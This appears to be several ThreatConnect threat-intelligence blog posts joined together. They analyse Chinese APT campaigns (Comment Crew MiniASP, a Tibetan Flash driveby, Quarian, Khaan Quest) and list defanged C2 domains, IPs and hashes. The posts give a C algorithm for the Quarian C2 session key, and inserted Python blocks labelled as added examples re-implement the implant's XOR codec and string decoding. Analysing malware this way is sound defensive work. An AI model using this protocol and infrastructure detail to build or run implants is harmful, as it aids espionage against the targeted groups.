Most noteworthy is that both gmailboxes[.]com and marsbrother[.]com have been identified by ThreatConnect Research, numerous security industry researchers, and the U.S. Government as associated with Comment Crew (aka APT1) for several years.  The first noted public reference to these domains was in 2011. This indicates that the attackers are comfortable actively reusing old infrastructure despite security industry awareness. The adversaries are likely maintaining operational successes because some security professionals possess short-term memories and myopic approaches when it comes to threat intelligence. Retaining this historic knowledge, with the ability to iteratively enrich it over time, is a key characteristic of a mature threat intelligence platform. In this case, ThreatConnect allowed ThreatConnect Research and any other user who had imported and consumed legacy Comment Crew / APT1 indicators to enrich and track the infrastructure.  Had users chosen to do so, they would have been immediately alerted by ThreatConnect to any infrastructure or context changes.

ThreatConnect Research observed that the C2 server (184.82.120[.]136) had multiple ZIP and password-protected RAR files which contained the malware implants likely used in other spearphishing campaigns.


The C2 server also hosted other executables and utilities disguised as .gif files, many of which have been identified as malicious tools and libraries used by the spear-phished implants most likely for lateral movement and network persistence.

Staged Spearphishing Payloads:

The following primary weaponized spearphish payloads consisted of fake document implants. ThreatConnect Research was able to recover the following files:

Malaysia Flight MH370 Theme:

  • Malaysia_Airlines_flight_MH370_What’ (MD5: a4ea7b217f61adc2931edcb2416942ab)
  • Malaysia Airlines flight MH370 What’s needed to find it.rtf.exe (MD5: fa9694553e5f9a9443ff4a5229798d32)
  • zerk.exe (MD5: 8842babc819e2024541dcff62c003fe6)

This implant clearly refers to the news surrounding Malaysia Airlines flight MH370, and leverages a decoy document containing an article excerpt from here.


Netherlands Pulse Trawl Fishing Theme:

  • (MD5: 4d7a5f722a36e95712410844848bdbe3)
  • Agreement to double pulse trawl licences.exe (MD5: 331c16e915eedb18ca9477df4c88109c)
  • WINWORD.EXE (MD5: 0cf73c57f17b200ac7aac7688ae59265)

This implant contained a decoy document taken from a Dutch government website here.

The article refers to approval of pulse trawl licenses for Dutch fishermen, which were initially rejected by the European Parliament.


Transatlantic Economy Theme:

  • Transatlantic Economy 2014 press release – March 10 (MD5: 336C8F0C8BDE5B4BB3974ECDD53B1FAB)
  • Transatlantic Economy 2014 press release – March 10 2014.exe (MD5: 3568f13f839a0551986292f7c9137aa5)
  • notepad.exe (MD5: 8842babc819e2024541dcff62c003fe6)

This implant uses a decoy document from here.


Final Stage Command & Control:

The final stage implant MD5: 8842babc819e2024541dcff62c003fe6 was dropped by both the Malaysia Airlines MH370 themed dropper and the 2014 Transatlantic Economy themed dropper, while the Trawl licenses themed implant dropped a different MD5, 0cf73c57f17b200ac7aac7688ae59265.

These final stage implants are variants of the Comment Crew MiniASP Trojan, and connect to the following malicious URLs on a likely compromised website:

  • [http:]//www.ustoo[.]com/cap2k/demo.png
  • [http:]//www.ustoo[.]com/cap2k/dc.asp
  • [http:]//www.ustoo[.]com/cap2k/di.asp
  • [http:]//www.ustoo[.]com/cap2k/index.asp
  • [http:]//www.ustoo[.]com/cap2k/index1.asp
  • [http:]//www.ustoo[.]com/cap2k/rd.asp

www.ustoo[.]com is affiliated with the medical-themed Us TOO International Prostate Cancer Support Community.

These www.ustoo[.]com callback URLs are remarkably similar to the previously reported Siesta Campaign related MiniASP callbacks found at:

  • [http:]//www.heliospartners[.]com/images/demo.png
  • [http:]//www.heliospartners[.]com/images/device_blog.asp
  • [http:]//www.heliospartners[.]com/images/device_input.asp
  • [http:]//www.heliospartners[.]com/images/device_mail.asp

Notably, the demo.png files found at both of these locations have the same image and contain the same algorithm for decrypting the encoded executable payload embedded within them. This encryption algorithm was documented on Page 72 of the Mandiant APT1 Appendix C: Malware Arsenal.


The encoded final stage implant from [http:]//www.ustoo[.]com/cap2k/demo.png decoded to the MD5: B6618129FE6ED94969527E63141429C2 (taskhostx.exe). This decoded implant is a variant of the Comment Crew Eclipse RAT, and connects to the malicious dynamic command and control domain account.jumpingcrab[.]com on IP address 103.25.56[.]44 (Adelaide, Australia).



Having the ability to regularly retain, enrich and manage knowledge is a basic requirement for any threat intelligence platform. Analysts must be able to automate and develop context around a threat, allowing them to understand the past and better prepare a defense against dynamic threat actors.

This enhanced understanding allows security professionals to adequately deliver effective decision support so that business leaders can make timely decisions. Mature enterprise netDefense and threat intelligence teams who are archiving data regarding specific threats and procedurally applying enrichments, analytics and context, would have had the opportunity to preposition mitigation scenarios around gmailboxes[.]com dating back to August of 2011 (which predates the Mandiant APT1 report).

Threat intelligence teams who were actively tracking gmailboxes[.]com subdomains within ThreatConnect would have also identified the March 11th DNS resolution to 184.82.120[.]136, enabling follow-on threat discovery processes. If they acted on this information they would have the ability to mitigate any C2 activity with a victim enterprise. The reality is that attackers do not necessarily have to create new infrastructure in order to facilitate new targeting campaigns, so data retention is vital when using threat intelligence to protect from any threat, “advanced” or otherwise.

If you or your enterprise wish to take advantage of ThreatConnect to aggregate, analyze and act on Threat Intelligence check out the various ThreatConnect product editions and deployment options. Register for a free Basic account now.

ThreatConnect Gets to the Root of Targeted Exploitation Campaigns

Executive Summary:

With 2013 coming to a close, many of us within the security industry take the time to reflect on the notable events that occurred over the past year.  It is often in these quiet times of contemplation that we find clarity and carry forward the lessons learned into the next year.

Unfortunately, with the complexities of modern enterprise security, there is far too much for us to remember individually.  It is the day-to-day, “in the trenches”, tactical fight that distracts many professionals from focusing on the strategic planning that serves as a guidepost for executing our longer term objectives.  Because of the amount of data to keep up with, key pieces of information slip through our fingers like sand.

Fortunately, the members of the ThreatConnect community have one less thing to commit to memory.  All of our users benefit from a shared perspective and ThreatConnect’s ability to retain and automate associations of related security events.

The following use case highlights how previous Adobe Flash driveby targeting campaigns, directed against Tibetan, Uyghur, and Chinese dissident victims in the Spring of 2013, have been automatically associated to a newly related security event which occurred in mid-December, nearly eight months later.

Operational Caveat:  At the time of this writing ThreatConnect Research is currently working with Adobe and Microsoft to validate the specific nature of the exploit being leveraged.  ThreatConnect Research will update Incident 20131216A: TibetOnline Flash Driveby as new information becomes available.

New Findings:

On December 16, 2013, the ThreatConnect Research Team identified an Adobe Flash Player SWF heap spray component on a Tibetan website.  The SWF file was found at the URL hXXp://www.tibetonline[.]info/test.swf, and may have been active since September 1, 2013 according to the “Last Modified” field within the HTTP response.


This Flash file, MD5: 4C37EC9F600AD90381DF2CCDCB00B0E6, is not actually the entire exploit; it is merely a heap spray shellcode component that also contains an embedded XOR 0x95 encoded payload executable. ThreatConnect Research has been able to confirm that the exploit is not leveraging a vulnerability in Adobe Flash Player. At the time of reporting, the exact application being exploited or initial exploitation vector is unknown. The XOR 0x95 executable embedded within test.swf decodes to the MD5: 26E442AA18FCEA38E4C652D346627238. It is worth noting that as of December 18, 2013, this malicious binary is only detected generically by 2 of 49 antivirus vendors in VirusTotal.

The binary is a backdoor implant which begins its routine by connecting to a Yahoo! blog found at the URL hXXp://[.]com/_JV67DRO5Y3JCOEVLMA5HXTNZT4/ and checking for the XOR 0x7E encoded hex string “7e160a0a0e4451511c1f1d15500c11110a1b0c500a1551=”.


This string decodes to the second stage command and control (C2) URL hXXp://back.rooter[.]tk/script. This URL returns XML containing version information and the client (victim) IP address.
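The decoding step above, as an added Python example (not code from the original post): it hex-decodes the quoted string, XORs each byte with 0x7E and defangs the result; a second function recovers an unknown single-byte key from a known plaintext fragment, which covers the XOR 0x95 payload mentioned earlier as well. Treating the trailing "=" as a terminator rather than hex data, and dropping the leading byte that decodes to 0x00, are assumptions.

```python
"""Decoder for the single-byte-XOR obfuscation used by the implant described
above (added example, not code from the original post). The hex string is the
one quoted in the text; the trailing '=' is treated as a terminator rather than
hex data (assumption), and the leading byte, which XORs to 0x00, is stripped.
The key recovery helper is a general technique for this kind of encoding."""

HEX_FROM_BLOG = "7e160a0a0e4451511c1f1d15500c11110a1b0c500a1551="   # quoted in the text


def xor_bytes(data, key):
    """XOR every byte with a single-byte key (the encoding is its own inverse)."""
    return bytes(b ^ key for b in data)


def defang(text):
    """Render a URL so it cannot be clicked or resolved by accident."""
    return text.replace("http", "hXXp").replace(".", "[.]")


def decode_c2_string(encoded_hex, key=0x7E):
    """Hex-decode, XOR with `key`, drop NUL bytes, return a defanged string."""
    raw = bytes.fromhex(encoded_hex.rstrip("="))
    plain = xor_bytes(raw, key).strip(b"\x00")
    return defang(plain.decode("ascii"))


def recover_xor_key(ciphertext, known_plaintext):
    """Brute-force the single-byte key by looking for a known fragment
    (e.g. b"http" for a URL, b"MZ" for an embedded PE file) in every candidate
    decoding. Returns the key, or None if no candidate contains the fragment."""
    for key in range(256):
        if known_plaintext in xor_bytes(ciphertext, key):
            return key
    return None


if __name__ == "__main__":
    raw = bytes.fromhex(HEX_FROM_BLOG.rstrip("="))
    key = recover_xor_key(raw, b"http")
    print("recovered key: 0x%02x" % key)
    print("decoded:", decode_c2_string(HEX_FROM_BLOG, key))
```

Note that the quoted string decodes to the base URL only; the /script path the text reports is not contained in it.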


The rooter[.]tk domain connects this recent exploit activity to a CVE-2013-0634 Flash exploit campaign from the spring of 2013 that ThreatConnect Research reported within APT #TargetedAttacks within @SocialMedia.  Although the rooter[.]tk domain was not specifically highlighted in this blog post, ThreatConnect Research included it within  ThreatConnect Incident 20130408A: Twitter Threats Blog and shared the incident with the ThreatConnect Community on April 8th 2013. ThreatConnect Research observed this domain as a CVE-2013-0634 driveby location with the URL hXXp://www.rooter[.]tk/my.swf.


Later in mid-May 2013, security researcher and contributor to the ThreatConnect Community Clement Lecigne shared details of a CVE-2013-1347 Internet Explorer (IE) exploit he found on the Voice of Tibet (VoT) website, which downloaded a payload executable from hXXp://www.rooter[.]tk/calc.exe, as seen in Incident 20130516A: Voice of Tibet Incident.  It is clear that the rooter[.]tk domain has been used consistently to target individuals and organizations associated with the Tibetan independence movement and continues to be active even as 2013 draws to a close.


As of mid-December, ThreatConnect Research has discovered a new exploit component that correlates with legacy “driveby” infrastructure previously identified in targeted exploitation campaigns directed against Tibetan interests.  While this shows how little these persistent attackers have changed over the course of a year, it also highlights how, without ThreatConnect and the value of a shared community, security professionals can potentially overlook key observations while they drown under the volume of meaningless data feeds.

Overwhelmed net defense teams are often challenged in identifying and correlating previous activity with current activity in a timely manner.  Without ThreatConnect’s automated associations capabilities, the memorialization of indicators, collaborative analytics and detailed context, the malicious rooter[.]tk domain may have been long forgotten.

The incident associated with the latest rooter[.]tk activity has been shared across all ThreatConnect Communities as Incident 20131216A: TibetOnline Flash Driveby. ThreatConnect Research will continue to provide dynamic updates to this incident within ThreatConnect as additional details become available.

If you or your enterprise security team are overwhelmed by feeds of meaningless data, and are unable to quickly contextualize or automate associations of activity, register for a ThreatConnect account.  Take control of your data, make sense of complex security events, and privately collaborate with other industry experts.

Divide and Conquer: Unmasking China's 'Quarian' Campaigns Through Community


In August and September, the ThreatConnect Research Team observed an increase in targeted attacks with a custom implant known as “Quarian.”  Based on links between current and historic activity, we are confident that it is a subset of a single Chinese Advanced Persistent Threat (APT) group using the implant and other previously observed tactics.  The focus of the attacks appears to be aimed at those involved with Syrian, broader Middle Eastern, and Islamic issues as previously observed from industry reporting.  This increase was also noted by McAfee-Labs in a blog from early October 2013. ThreatConnect Research took a focused look at the historic and recent Quarian activity to come to a few conclusions about the Quarian threat itself.

ThreatConnect Research assesses that the increase in activity that lasted into September was due to the increased tensions over rumors of a US intervention against the Assad regime and the eventual agreement by Syria to put its chemical weapons under international control.  China has an ideological interest in maintaining its policy of non-interference in sovereign nations’ affairs, a stance it often cites when accused of its own human rights violations, but remains highly interested in the evolving situation in Syria.  While the international attention on Syria has again taken a lull in recent weeks, the situation there has by no means been fully resolved, and neither has China’s interest in it.  If international tensions rise to the point of potential military intervention again, there will likely be increased Quarian activity in support of China’s intelligence requirements around the issue.

The Quarian operators have not varied their malware, infrastructure, or overall capabilities much since last year, which allows members of the ThreatConnect Communities to follow and collaborate together in an effort to better defend their respective enterprises from Quarian activity.  Despite the lull in Quarian reporting prior to last month, the group using the implant has quietly continued their operations, regardless of moderate to high antivirus (AV) detection and industry reporting.

Quarian activity was first publicly highlighted in late November 2012 by the Kaspersky Global Research & Analysis Team (GReAT), which issued a blog on Securelist that analyzed the attachment of a spearphishing email that had been pulled from a dump of Syrian Ministry of Foreign Affairs (MoFA) documents publicly released by the Anonymous collective.  The implant, dubbed Quarian (or “Dougat”) by the AV community, was also reported by TrendMicro in a follow-up blog as additional spearphishing emails and trojanized documents were discovered.  In a noteworthy example, one of these attempts targeted the US State Department.  The SourceFire Vulnerability Research Team (VRT) also followed up by publishing an analysis of Quarian’s custom command and control (C2) protocol.  Interest from the community eventually waned and published research of the Quarian threat slowed by 2013.

Quarian Targeting:

Although not exclusively the case, the theme of the trojanized documents focused mainly on Middle Eastern or Islamic diplomatic issues.  In the case of “Beware_of_the_shadows_behind_the_Syrian_issue_.doc” (MD5: 4B39C6A453440D88B8397540EF54344C), the Quarian actors revisit the Syrian conflict theme.  The malicious document drops the implant “iexplorer.exe” (MD5: 458C1D3D3FFCFF137009404E235DF57C).  The content of the infected document is taken directly from an English version of the Chinese state-run People’s Daily editorial located here.  Secondly, another document exploit, “Sajjad Karim’s statement on HR situation.doc” (MD5: C8E85628B0B656A467D2E6BD19AB2DE7), drops the implant “update.exe” (MD5: E1F509EC36E38ECAF0A9A064FE0D58CC).  Sajjad Karim is a member of the European Parliament, elected in 2004 as its first British Muslim.  As noted, this European Union themed document indicates that the Quarian targeting activity is likely not directed only against individuals and organizations with Syrian or Middle Eastern interests, but possibly against broader regional security interests.  Another exploit, “Top_10_striking_women_in_Asia.doc”, used the common lure of beautiful women to entice the would-be victim to open the document.  The following table shows all filenames from a few recent Quarian targeting campaigns.

Table 1. Quarian Document Exploits and Implants

Common Quarian Infrastructure:

Although multiple threat groups often have access to and use the same backdoors (because they are available publicly, commercially, or shared amongst threat groups) it is typically not sound analytic practice to link disparate activity together by looking at the malware alone.  One of the most practical applications of “The Diamond Model” – used as a guidepost within ThreatConnect intelligence research and analysis – is linking activity by more than one diamond vertex (e.g. malware to infrastructure, actor to malware, etc.).  In the case of recent Quarian activity, we can see clear linkages in both the current malware and the infrastructure to earlier identified campaigns.  This underscores the importance of tracking details and tactical indicators, identified in past events, to enable a proactive and preventative stance in the face of future targeted attacks.

Prior to the October McAfee Quarian blog, the ThreatConnect Community had seen fifteen unique samples, eleven since last August, all of which used the C2 infrastructure outlined in Table 2.  The compile times suggest five to six distinct targeting waves, with the earliest wave fitting the time frame of the original Kaspersky blog and the latest occurring in early September of this year.

Note that MD5: 3C7AD543E77E54DB95DB6D26B21159D8 is listed twice because it was dropped from two separate implanted documents Building_a_Relationship_with_Your_Children.doc and Top_10_striking_women_in_Asia_.doc.

Table 2. Compile times, Quarian Implants and associated C2 domains

The malware analysis data within Table 2 was compiled from analysis results obtained with Joe Sandbox.  For more information about Joe Sandbox, please visit Joe Security.

Since early August, the domains referenced in Table 2 have resolved to the same handful of IP addresses as seen in Table 3 thus far:

Table 3. Quarian C2 IP Address Infrastructure and resolutions

In addition to the domains in Table 2, sureshreddy1.dns05[.]com, which was reported in last year’s Kaspersky blog, had previously resolved concurrently to several of these IP addresses.  The domain fouiskrish.ns01[.]info has previously resolved to some of these IP addresses at the same time as those in Table 2.  The example of “DNS tracks” seen in Figure 1, compiled within ThreatConnect, also demonstrates how the C2 infrastructure from the Quarian samples consistently resolves to the same IP addresses.  This firmly establishes a common infrastructure usage connection across known samples of the Quarian backdoor.


Figure 1. IP resolutions.

According to IP Whois data, three of these IP addresses, 216.244.81[.]141, 216.176.190[.]197, and 216.176.190[.]205, are registered to a private customer through wowrack[.]com, a managed hosting provider (see figures 3 and 4 below).  The private customer appears to be located in Dalian, China. The name ZHAOWEIWANG is associated with the network IP allocations. The resolutions to these networks began in mid-August, persisted through October, and continue as of publication.  The IP address 216.244.81[.]41 is associated with another apparent China-located private wowrack[.]com customer, with the name ZHOUJUN associated with the IP address range.


A similar pattern is seen with two more of the IP addresses, 50.117.123[.]108 and 50.117.120[.]112. These addresses were active some time prior to the resolution of the Wowrack IP addresses, from May to early September.  As is seen in Figures 5 and 6 below, these IPs are leased to a LiaoZhiBin, based in Shanghai, China through EGI Hosting.


Note: This does not imply that any of the entities leasing these netblocks, or their hosting providers, are responsible or even aware of the malicious infrastructure resolving to their networks.

Another interesting piece of historic data concerns the resolutions of the sureshreddy1.dns05[.]com domain.  As evidenced in the Securelist blog post, this domain was resolving to IP addresses in the Beijing netblock (ASN 4808).  More recently, on September 23rd, the Quarian C2 domain everyday.xxuz[.]com also resolved to an IP in this netblock. This ASN / netblock is quite notorious for its association with suspected Chinese APT activity and has been previously related to the Mirage Campaign as well as domains found in our own Khaan Quest blog and another blog post from earlier this year.  It seems in this campaign that the actors have largely moved away from using the Beijing-based IP ranges in favor of rotating through hosting providers for their “victim facing” C2 nodes.  Still, the historic use of these netblocks suggests the Quarian campaigns may be linked to a much broader set of related APT activity.

Exploits Leveraged:

The document used to target the Syrian MoFA leveraged an exploit for CVE-2010-0188 and was delivered on December 5th, 2011, nearly a year and a half after a fix was available.  The document that purportedly targeted the State Department was sent June 5th, 2012 and leveraged CVE-2010-3333.  This time the Quarian actors were only about seven months behind the patch, which may be considered a slight improvement in their initial targeting window.  ThreatConnect Research observed another CVE-2010-3333 attempt with MD5: 60fd5f5140ccfa4d838948c7ab0f4201 in April 2013.  However, in the most recent Quarian targeting, all documents leveraged CVE-2012-0158.  Considering the patch for CVE-2012-0158 was released in April 2012 with MS12-027, the Quarian actors are comfortable leveraging an exploit that was patched over a year ago.  As a disclaimer, we constantly observe multiple threat groups using CVE-2012-0158 exploits, as it is currently a favored and reliable publicly known Office exploit.  What we can infer is that this APT group has the basic ability to leverage or acquire exploits for well-known and patched vulnerabilities, and that they will continue targeting users with the minimal amount of effort that results in successful exploitation.  If the Quarian actors possess more agile timelines for leveraging newer or unknown (zero-day) exploits, they have not demonstrated it with the observed campaigns. ThreatConnect Research assesses the Quarian group’s demonstrated sophistication in leveraging new exploits as low based on their observed patterns of activity.

Quarian Network Protocol Analysis:

The SourceFire VRT blog detailed an in-depth analysis of Quarian’s C2 protocol.  In the samples we analyzed, we noticed similar but slightly different behavior. As is detailed in both Securelist’s and VRT’s blogs, the malware checks for proxy settings and, if present, sends a misspelled HTTP CONNECT request to the local proxy.  If there is no proxy configured, you will see a direct connection to the C2 server over TCP 443.  One difference noted was how the session XOR encryption key was established. In the VRT samples, each side used its own 8-byte XOR key to obfuscate the commands and responses passed between them. With the samples obtained by ThreatConnect Research, the implant sent an 8-byte nonce, the C2 responded with a different 8-byte nonce, and the implant XORed the C2 nonce with its own nonce to establish a session key.  Both sides used the new session key to XOR the commands and responses passed between them.

The algorithm that the implant used to compute the session key is below:

for (i = 0; i < 8; i++) {
    c = C2_nonce[i] ^ implant_nonce[i];   /* combine the two 8-byte nonces */
    if (c == 0) c = ~i;                   /* never leave a zero byte in the key */
    session_key[i] = c;
}

The implant_nonce is the initial 8 bytes sent by the implant and C2_nonce is the 8 bytes received from the C2. The algorithm prevented any 0 bytes from appearing in the session key, which would have otherwise allowed some cleartext data to pass unencoded over the network.  Data was encoded/decoded by XOR’ing each byte against the session key on a rotating basis, as expected.  However, it did not restart at the first byte of the key with every encoding.  The indexes of the last key byte used for encoding and for decoding were stored and then retrieved when it was time to encode/decode another packet.  The indexes were initialized to 0, and then never zeroed again during the life of the session, i.e. until a new session handshake was performed.
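The handshake and rotating codec described in the two paragraphs above, as an added Python example (not code from the original post or from the implant): it derives the session key exactly as the loop above does, then shows why a decoder that restarts at the first key byte for every packet goes wrong from the second packet onwards. The nonces and messages are constructed samples, not captured traffic.

```python
"""Re-implementation of the Quarian session-key derivation and the rotating
XOR codec described above (added example, not code from the original post or
from any published tool). The nonces and messages are constructed samples."""


def derive_session_key(implant_nonce, c2_nonce):
    """XOR the implant's 8-byte nonce with the C2's. A zero result byte is
    replaced by the low byte of ~i so the key never contains 0x00, which
    would otherwise leave the corresponding cleartext bytes unencoded."""
    if len(implant_nonce) != 8 or len(c2_nonce) != 8:
        raise ValueError("both nonces must be exactly 8 bytes")
    key = bytearray()
    for i in range(8):
        c = c2_nonce[i] ^ implant_nonce[i]
        if c == 0:
            c = (~i) & 0xFF          # 0xFF, 0xFE, ... never zero
        key.append(c)
    return bytes(key)


class QuarianSessionCodec:
    """Rotating XOR with separate send and receive key indexes. Both start at
    0 after the handshake and are never reset, so packet N continues where
    packet N-1 stopped instead of restarting at key[0]."""

    def __init__(self, session_key):
        self.key = session_key
        self.enc_index = 0
        self.dec_index = 0

    def _xor(self, data, start):
        out = bytearray(len(data))
        idx = start
        for n, b in enumerate(data):
            out[n] = b ^ self.key[idx]
            idx = (idx + 1) % len(self.key)
        return bytes(out), idx

    def encode(self, plaintext):
        out, self.enc_index = self._xor(plaintext, self.enc_index)
        return out

    def decode(self, ciphertext):
        out, self.dec_index = self._xor(ciphertext, self.dec_index)
        return out


def naive_decode(session_key, ciphertext):
    """What a decoder that restarts at key[0] for every packet produces;
    it is correct for the first packet of a session only."""
    return bytes(b ^ session_key[i % len(session_key)] for i, b in enumerate(ciphertext))


def exchange_demo():
    """Handshake, then two implant-to-C2 packets decoded by a stateful C2 side
    and by the naive decoder, to show why the persistent index matters."""
    implant_nonce = bytes.fromhex("1122334455667788")   # constructed sample
    c2_nonce = bytes.fromhex("11a0330f55017780")        # constructed sample
    key = derive_session_key(implant_nonce, c2_nonce)

    implant = QuarianSessionCodec(key)   # implant's sending state
    c2 = QuarianSessionCodec(key)        # controller's receiving state
    packets = [b"CMD:dir", b"ok"]        # constructed sample traffic
    wire = [implant.encode(p) for p in packets]

    stateful = [c2.decode(w) for w in wire]
    naive = [naive_decode(key, w) for w in wire]
    return {
        "session_key": key,
        "stateful_ok": stateful == packets,
        "naive_first_ok": naive[0] == packets[0],
        "naive_second_ok": naive[1] == packets[1],
    }


if __name__ == "__main__":
    result = exchange_demo()
    print("session key:", result["session_key"].hex())
    print("stateful decode matches:", result["stateful_ok"])
    print("naive decode matches (1st, 2nd):", result["naive_first_ok"], result["naive_second_ok"])
```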

Figure 7. PCAP of Quarian communication with controller

The variety of slightly different C2 protocols in the wild could show that the Quarian APT group was attempting to diversify its capabilities to help avoid detection.  However, the same easy to find proxy and mutex strings were still present in the newer malware, which would again suggest little concern was placed on public awareness of their malware and its network characteristics.


China, along with Russia, has actively blocked U.N. Resolutions against Syria throughout the crisis from their seat on the U.N. Security Council.  While China’s interests are not as obvious as Russia’s with Syria, China and Syria maintain strong economic and military ties that existed prior to the crisis.  In terms of the Quarian actors’ operational security, either their threshold for public attention is high or their ability to quickly adapt is low, as demonstrated by their resistance to significant changes despite multiple public reports detailing their malware and infrastructure.  Many of the characteristics of Quarian align with the textbook standard for other “China-nexus” APT groups (e.g. spearphishing emails for targeted exploit delivery, use of dynamic DNS services for C2 infrastructure, use of “good-enough” exploits to gain system and network access).  Keeping track of persistent network threats as they evolve, as we have done with the Quarian campaigns, is a repeatable process within ThreatConnect.

The following graphic (Figure 8) highlights the value of collaboration, threat intelligence sharing and fused perspective obtained from community reporting over time.  This extended visibility into a persistent threat group gives a shared awareness to network defense and enterprise security teams that need to protect themselves from this or any other persistent threat.


Figure 8.  Graphic representation of Quarian activity overlaid with ThreatConnect Research and AV industry reporting.

Our ongoing and dynamic analyses of the various Quarian implants have all been shared within the exclusive ThreatConnect Subscriber Community as they were discovered, packaged nicely with exportable indicators and signatures. For more information about moderated subscriber communities please click here or contact us with any questions.

With the publication of this blog, the Threat “QUARIAN APT”  and the following ThreatConnect Incidents have now been shared system wide to all public and private ThreatConnect Communities along with Snort and Yara signatures that detect the observed version of the Quarian implant.

If your organization is interested in obtaining regular crowd-sourced threat intelligence that increases your awareness of existing or emerging threats like Quarian, please register at ThreatConnect, join our communities or create your own, connect and collaborate together.

Khaan Quest: Chinese Cyber Espionage Targeting Mongolia

Executive Summary:

The ThreatConnect Research Team has identified a weaponized Microsoft Word document that contains a Concept Development Conference (CDC) announcement for the joint US and Mongolia military exercise called Khaan Quest 2014.  Retrospective research by the ThreatConnect Research Team identified additional decoy documents, written in Mongolian, themed around events like the Mongolian presidential election held in June 2013. This activity represents Chinese Computer Network Exploitation (CNE) activity against Mongolian entities and others that have economic, military, or diplomatic relations with Mongolia.  Mongolia’s attempt to steer a more independent path by reaching out to what it calls “third neighbors,” such as the United States, Japan, South Korea, and the European Union, is possibly prompting China to conduct CNE. This would help China maintain awareness of changes in Mongolian relations with the US and other Western influences and protect their national interests in Mongolia.

Details associated with this threat have been shared within all ThreatConnect Communities as Incident “20130910A: KQ14 – CDC Document Exploit”.

Analysis of Khaan Quest 2014 CDC Message:

ThreatConnect Research has identified a weaponized Microsoft Word document that appears to be an official unclassified announcement from the US Army Pacific, notifying Army, Marine Corps and State Department entities of a pre-planning CDC for a US military exercise, Khaan Quest 2014. This document “DRAFT MSG – KQ14 – CDC ANNOUNCE MESSAGE.doc” (MD5: F541CADA66C9E801976C30DEEF4AD42D) exploits CVE-2012-0158 and drops an implant (MD5: 6AB333C2BF6809B7BDC37C1484C771C5) that calls out to the malicious command and control (C2) domains peaceful.linkpc[.]net, mongolia.regionfocus[.]com, and mseupdate.strangled[.]net.


Additional Mongolian Defense Exercise Targeting:

Additional ThreatConnect Research analysis identified a document “VN Tsergiin acedemy update.doc” (MD5: 65587968eead577c54d55db170ca2fd2) exploiting CVE-2012-0158 that dropped the same malicious implant (MD5: 6AB333C2BF6809B7BDC37C1484C771C5) and calls out to the same domains as the Khaan Quest document.  This document is written in Mongolian and appears to be an official Ministry of Defense announcement of plans for military training with the Vietnamese military.  This may indicate that a broader targeting campaign is occurring against Mongolian Ministry of Defense entities responsible for plans and exercises.



When executed, both of the documents are engineered to exploit CVE-2012-0158, drop the same malicious implant, “DW20.exe” (MD5: 6AB333C2BF6809B7BDC37C1484C771C5), and interact with the same C2 infrastructure.


Once successfully installed on the victim host, the implant issues a GET request to the following hardcoded path and file /2011/n325423.shtml:



The implant also contains the following hardcoded C2 strings:



ThreatConnect Infrastructure Enrichments:

Follow-on research identified additional C2 domains. ThreatConnect Research observed numerous infrastructure overlaps among peaceful.linkpc[.]net, mongolia.regionfocus[.]com, and mseupdate.strangled[.]net.  As of early October 2013, all of the C2 domains identified in these examples have overlapped, resolving to a common IP address, 113.10.205[.]236 (Hong Kong).


Retrospective analysis of domain resolutions from October 7th 2011 to October 7th 2012 reveals that the threat actors have consistently used common infrastructure, such as IP addresses 58.64.200[.]105 and 58.64.200[.]106 (Hong Kong).
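The overlap-and-pivot step described in the two paragraphs above, as an added example that is not ThreatConnect or Maltego code: it groups defanged passive-DNS records by resolving IP within a date window and pivots from one known-bad domain to the others that shared infrastructure with it. The resolution records and their dates are constructed; the domains and IPs are the ones named in this section.

```python
"""Infrastructure-overlap pivot over passive-DNS data. Added example, not
ThreatConnect or Maltego code: the (domain, ip, first_seen, last_seen) records
are constructed with made-up dates; domains and IPs are the ones in the post."""
from collections import defaultdict
from datetime import date


def refang(indicator):
    """Turn a defanged IoC ('a.b[.]net', '1.2.3[.]4') into its plain form."""
    return indicator.replace("[.]", ".")


# Constructed passive-DNS records; 203.0.113.9 is an RFC 5737 documentation address.
PDNS = [
    ("peaceful.linkpc[.]net",      "113.10.205[.]236", date(2013, 9, 20), date(2013, 10, 7)),
    ("mongolia.regionfocus[.]com", "113.10.205[.]236", date(2013, 9, 28), date(2013, 10, 7)),
    ("mseupdate.strangled[.]net",  "113.10.205[.]236", date(2013, 10, 1), date(2013, 10, 7)),
    ("mongolia.regionfocus[.]com", "58.64.200[.]105",  date(2011, 10, 7), date(2012, 3, 1)),
    ("mseupdate.strangled[.]net",  "58.64.200[.]105",  date(2012, 1, 15), date(2012, 10, 7)),
    ("peaceful.linkpc[.]net",      "58.64.200[.]106",  date(2012, 4, 1),  date(2012, 10, 7)),
    ("unrelated-example[.]org",    "203.0.113[.]9",    date(2012, 1, 1),  date(2012, 12, 31)),
]

# Analysis windows from the post: early October 2013, and 7 Oct 2011 to 7 Oct 2012.
RECENT = (date(2013, 10, 1), date(2013, 10, 7))
RETRO = (date(2011, 10, 7), date(2012, 10, 7))


def shared_infrastructure(records, start=None, end=None):
    """Group domains by resolving IP, keeping only IPs that hosted two or more
    distinct domains whose resolution window intersects [start, end].
    Returns {ip: sorted list of domains}."""
    by_ip = defaultdict(set)
    for domain, ip, first_seen, last_seen in records:
        if start is not None and last_seen < start:
            continue  # resolution ended before the window opened
        if end is not None and first_seen > end:
            continue  # resolution began after the window closed
        by_ip[refang(ip)].add(refang(domain))
    return {ip: sorted(domains) for ip, domains in by_ip.items() if len(domains) >= 2}


def pivot(records, seed_domain):
    """From one known-bad domain, return every other domain that ever resolved
    to an IP the seed also resolved to (one hop of the Maltego-style pivot)."""
    seed = refang(seed_domain)
    seed_ips = {refang(ip) for domain, ip, *_ in records if refang(domain) == seed}
    linked = {refang(domain) for domain, ip, *_ in records if refang(ip) in seed_ips}
    linked.discard(seed)
    return sorted(linked)


if __name__ == "__main__":
    print(shared_infrastructure(PDNS, *RECENT))
    print(shared_infrastructure(PDNS, *RETRO))
    print(pivot(PDNS, "peaceful.linkpc[.]net"))
```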



A Nexus to China:

ThreatConnect Research analyzed the registration point of contact information for the domains that were hardcoded in implant MD5: 6AB333C2BF6809B7BDC37C1484C771C5 and previously resolved to IP addresses 58.64.200[.]105 and 58.64.200[.]106.  Analysis was performed to discover any connections between the contact information provided to register the malicious domains and any personal information posted on the Internet by an adversary that may have been responsible for this activity.  The following email addresses have been used to register the domains of interest.

Analyst Comment: ThreatConnect Research recognizes that there are other domains and subdomains associated with these malicious registrants, however the focus is in the context of the referenced activity.


